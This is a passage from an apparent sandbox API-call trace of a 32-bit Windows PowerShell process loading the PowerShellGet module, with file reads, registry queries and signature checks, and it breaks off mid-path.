(x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0112.218] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x5a0e824 | out: lpFindFileData=0x5a0e824*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e2e0 [0112.219] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0112.219] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0112.219] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0112.219] FindClose (in: hFindFile=0x68e2e0 | out: hFindFile=0x68e2e0) returned 1 [0112.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e4) returned 1 [0112.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ea44) returned 1 [0112.219] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0112.219] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0112.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c8) returned 1 [0112.219] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea8c | out: lpFileInformation=0x5a0ea8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0112.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c4) returned 1 [0112.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0112.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0112.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0112.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0112.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7ec) returned 1 [0112.291] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25cbd24 | out: lpFileInformation=0x25cbd24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0112.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e8) returned 1 [0112.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0112.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0112.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e954) returned 1 [0112.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3f0 [0112.292] GetFileType (hFile=0x3f0) returned 0x1 [0112.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e950) returned 1 [0112.292] GetFileType (hFile=0x3f0) returned 0x1 [0112.293] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e990*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e990*=0) returned 0x0 [0112.293] ReadFile (in: hFile=0x3f0, lpBuffer=0x25ccafc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e9bc, lpOverlapped=0x0 | out: lpBuffer=0x25ccafc*, lpNumberOfBytesRead=0x5a0e9bc*=0x1000, lpOverlapped=0x0) returned 1 [0112.342] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e990*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e990*=0) returned 0x1000 [0112.343] ReadFile (in: hFile=0x3f0, lpBuffer=0x25ccafc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e9bc, lpOverlapped=0x0 | out: lpBuffer=0x25ccafc*, lpNumberOfBytesRead=0x5a0e9bc*=0xde, lpOverlapped=0x0) returned 1 [0112.375] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e990*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e990*=0) returned 0x10de [0112.376] ReadFile (in: hFile=0x3f0, lpBuffer=0x25ccafc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e9bc, lpOverlapped=0x0 | out: lpBuffer=0x25ccafc*, lpNumberOfBytesRead=0x5a0e9bc*=0x0, lpOverlapped=0x0) returned 1 [0112.376] CloseHandle (hObject=0x3f0) returned 1 [0112.381] CoCreateGuid (in: pguid=0x5a0e9fc | out: pguid=0x5a0e9fc*(Data1=0x39810dde, Data2=0xb776, Data3=0x4586, Data4=([0]=0x86, [1]=0x5f, [2]=0xae, [3]=0xdd, [4]=0x43, [5]=0x3f, [6]=0x96, [7]=0x5a))) returned 0x0 [0112.391] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f0 [0112.391] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3f4 [0112.391] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f8 [0112.392] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3fc [0112.392] SetEvent (hEvent=0x3fc) returned 1 [0112.392] SetEvent (hEvent=0x3f0) returned 1 [0112.392] SetEvent (hEvent=0x3f4) returned 1 [0112.392] SetEvent (hEvent=0x3f8) returned 1 [0112.420] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x404 [0112.420] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.526] EtwEventActivityIdControl () returned 0x0 [0112.526] EtwEventActivityIdControl () returned 0x0 [0112.526] EtwEventActivityIdControl () returned 0x0 [0112.607] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0112.630] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0112.631] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0112.631] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0e334, Length=0x20, ResultLength=0x5a0e3a4 | out: SystemInformation=0x5a0e334, ResultLength=0x5a0e3a4*=0x0) returned 0xc0000003 [0112.631] GetSystemInfo (in: lpSystemInfo=0x5a0e3b0 | out: lpSystemInfo=0x5a0e3b0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0112.632] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e340 | out: phkResult=0x5a0e340*=0x408) returned 0x0 [0112.632] RegQueryValueExW (in: hKey=0x408, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0e35c, lpData=0x0, lpcbData=0x5a0e358*=0x0 | out: lpType=0x5a0e35c*=0x0, lpData=0x0, lpcbData=0x5a0e358*=0x0) returned 0x2 [0112.632] RegCloseKey (hKey=0x408) returned 0x0 [0112.640] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0112.640] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0112.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2b8) returned 1 [0112.641] CreateFileW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x408 [0112.641] GetFileType (hFile=0x408) returned 0x1 [0112.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2b4) returned 1 [0112.641] GetFileType (hFile=0x408) returned 0x1 [0112.641] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e2f4*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e2f4*=0) returned 0x0 [0112.642] ReadFile (in: hFile=0x408, lpBuffer=0x25f0114, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e320, lpOverlapped=0x0 | out: lpBuffer=0x25f0114*, lpNumberOfBytesRead=0x5a0e320*=0x1000, lpOverlapped=0x0) returned 1 [0112.643] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e2f4*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e2f4*=0) returned 0x1000 [0112.643] ReadFile (in: hFile=0x408, lpBuffer=0x25f0114, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e320, lpOverlapped=0x0 | out: lpBuffer=0x25f0114*, lpNumberOfBytesRead=0x5a0e320*=0xde, lpOverlapped=0x0) returned 1 [0112.643] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e2f4*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e2f4*=0) returned 0x10de [0112.643] ReadFile (in: hFile=0x408, lpBuffer=0x25f0114, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e320, lpOverlapped=0x0 | out: lpBuffer=0x25f0114*, lpNumberOfBytesRead=0x5a0e320*=0x0, lpOverlapped=0x0) returned 1 [0112.644] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0e288, Length=0x20, ResultLength=0x5a0e2f8 | out: SystemInformation=0x5a0e288, ResultLength=0x5a0e2f8*=0x0) returned 0xc0000003 [0112.644] GetSystemInfo (in: lpSystemInfo=0x5a0e304 | out: lpSystemInfo=0x5a0e304*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0112.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e294 | out: phkResult=0x5a0e294*=0x40c) returned 0x0 [0112.645] RegQueryValueExW (in: hKey=0x40c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0e2b0, lpData=0x0, lpcbData=0x5a0e2ac*=0x0 | out: lpType=0x5a0e2b0*=0x0, lpData=0x0, lpcbData=0x5a0e2ac*=0x0) returned 0x2 [0112.645] RegCloseKey (hKey=0x40c) returned 0x0 [0112.645] CloseHandle (hObject=0x408) returned 1 [0112.648] CoCreateGuid (in: pguid=0x5a0e384 | out: pguid=0x5a0e384*(Data1=0x1dd811f9, Data2=0x56fa, Data3=0x4e32, Data4=([0]=0xb7, [1]=0x6, [2]=0x69, [3]=0x41, [4]=0xdc, [5]=0x8b, [6]=0xb5, [7]=0xf3))) returned 0x0 [0112.666] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0e0e4 | out: lpPerformanceCount=0x5a0e0e4*=2939747702186) returned 1 [0112.667] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0112.667] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0112.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ddd0) returned 1 [0112.667] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e094 | out: lpFileInformation=0x5a0e094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0112.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ddcc) returned 1 [0112.669] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0112.670] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0112.670] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0112.670] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0112.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0dd64) returned 1 [0112.670] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e028 | out: lpFileInformation=0x5a0e028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0112.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0dd60) returned 1 [0112.670] CoTaskMemAlloc (cb=0x10) returned 0x6c1328 [0112.670] CoTaskMemAlloc (cb=0x10) returned 0x6c1388 [0112.670] CoTaskMemAlloc (cb=0xb4) returned 0x6c5820 [0112.671] CoTaskMemAlloc (cb=0x30) returned 0x5bc3f38 [0112.671] WinVerifyTrust () returned 0x800b0100 [0112.689] CoTaskMemFree (pv=0x6c1328) [0112.689] CoTaskMemFree (pv=0x5bc3f38) [0112.689] CryptCATHandleFromStore () returned 0x65b2f8 [0112.689] WTHelperGetProvSignerFromChain () returned 0x0 [0112.690] CoTaskMemAlloc (cb=0x10) returned 0x6c1328 [0112.690] CoTaskMemAlloc (cb=0x30) returned 0x5bc3f38 [0112.690] WinVerifyTrust () returned 0x0 [0112.690] CoTaskMemFree (pv=0x5bc3f38) [0112.690] CoTaskMemFree (pv=0x6c1328) [0112.690] CoTaskMemFree (pv=0x6c5820) [0112.690] CoTaskMemFree (pv=0x6c1388) [0112.823] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\en-US\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\en-us\\powershellget.psd1")) returned 0xffffffff [0112.824] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\en\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\en\\powershellget.psd1")) returned 0xffffffff [0112.906] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0112.913] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0112.917] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0112.917] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0112.917] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0112.917] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x47, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x46 [0113.041] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0da20 | out: phkResult=0x5a0da20*=0x408) returned 0x0 [0113.041] RegQueryValueExW (in: hKey=0x408, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0da40, lpData=0x0, lpcbData=0x5a0da3c*=0x0 | out: lpType=0x5a0da40*=0x1, lpData=0x0, lpcbData=0x5a0da3c*=0x56) returned 0x0 [0113.041] RegQueryValueExW (in: hKey=0x408, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0da40, lpData=0x261bbfc, lpcbData=0x5a0da3c*=0x56 | out: lpType=0x5a0da40*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0da3c*=0x56) returned 0x0 [0113.041] RegCloseKey (hKey=0x408) returned 0x0 [0113.045] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0113.063] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0113.064] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSGet.Format.ps1xml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psget.format.ps1xml")) returned 0x20 [0113.065] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0da20 | out: phkResult=0x5a0da20*=0x408) returned 0x0 [0113.065] RegQueryValueExW (in: hKey=0x408, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0da40, lpData=0x0, lpcbData=0x5a0da3c*=0x0 | out: lpType=0x5a0da40*=0x1, lpData=0x0, lpcbData=0x5a0da3c*=0x56) returned 0x0 [0113.065] RegQueryValueExW (in: hKey=0x408, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0da40, lpData=0x26293dc, lpcbData=0x5a0da3c*=0x56 | out: lpType=0x5a0da40*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0da3c*=0x56) returned 0x0 [0113.065] RegCloseKey (hKey=0x408) returned 0x0 [0113.073] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0113.082] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files 